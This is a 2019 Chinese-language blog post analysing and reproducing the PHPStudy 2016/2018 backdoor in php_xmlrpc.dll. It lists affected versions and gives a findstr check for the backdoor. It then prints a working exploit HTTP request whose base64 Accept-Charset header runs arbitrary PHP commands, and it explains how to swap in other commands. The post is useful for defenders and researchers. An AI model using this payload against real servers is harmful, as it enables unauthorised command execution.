PHPStudy後門分析+復現 & 附批量Py腳本

  • 2019 年 10 月 7 日
  • 筆記

phpstudy簡介

Phpstudy是一款PHP調試環境的程序集成包,集成了最新的Apache、PHP、phpMyAdmin、ZendOptimizer等多款軟件一次性安裝,無需配置,即裝即用。由於其免費且方便的特性,在國內有着近百萬的PHP語言學習者、開發者用戶。

後門名稱:Phpstudy後門

威脅等級嚴重

影響範圍:Phpstudy 2016、phpstudy2018

後門類型:C&C、命令執行

利用難度:極易

影響範圍

目前已知受影響的phpstudy版本:

· Phpstudy 2016版php-5.4

· Phpstudy 2018版php-5.2.17

· Phpstudy 2018版php-5.4.45

隱藏後門分析

通過分析,後門代碼存在於extphp_xmlrpc.dll模塊中,至少有2個版本:

用戶可以通過搜索php_xmlrpc.dll模塊中包含「@eval」關鍵字快速判斷是否是存在後門的版本,命令參考:

findstr /m /s /c:"@eval" *.* Jaky,公眾號:洛米唯熊phpStudy隱藏後門預警

以上後門分析轉自洛米唯熊

隱藏後門復現

就在昨晚,大佬就在朋友圈分享了phpstudy後門的exp

而我自己的phpstudy是很久以前就安裝在電腦的2018版本

那麼我們就來看看,這個exp能否復現成功呢?

EXP如下:

GET /1.php HTTP/1.1  Host: secquan.org  Cache-Control: max-age=0  Upgrade-Insecure-Requests: 1  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8  Accept-Language: zh-CN,zh;q=0.9  Accept-Encoding:gzip,deflate  Accept-Charset:這裡就是要執行的命令base64加密c3lzdGVtKCdjYWxjLmV4ZScpOw==  Cookie: UM_distinctid=16ae380e49f27e-0987ab403bca49-3c604504-1fa400-16ae380e4a011b; CNZZDATA3801251=cnzz_eid%3D1063495559-1558595034-%26ntime%3D1559102092; CNZZDATA1670348=cnzz_eid%3D213162126-1559207282-%26ntime%3D1559207282  Connection: close

Accept-Charset 地方就是我們exp的核心,如果想要執行其他命令,直接去把命令進行base64編碼即可!

那我們來打開我們的18版的phpstudy

我的配置情況:PHP 5.4.45 + Apache

接下來打開神器burpsuite開始抓包復現就可以了

把exp寫上去後,我們再將phpinfo();進行base64編碼然後進行測試

Phpinfo();=cGhwaW5mbyUyOCUyOSUzQg==

點擊GO

成功的復現了這個漏洞,所以phpstudy的2018和2016版本,是可以成功復現他的後門的


文章到這裡就結束了嗎?不,並沒有。

因為我要在這裡分享兩個poc:一個是批量檢測的poc,另一個是漏洞復現的poc

Poc如下:

這是批量檢測的py

這個是漏洞復現的py

Exit mobile version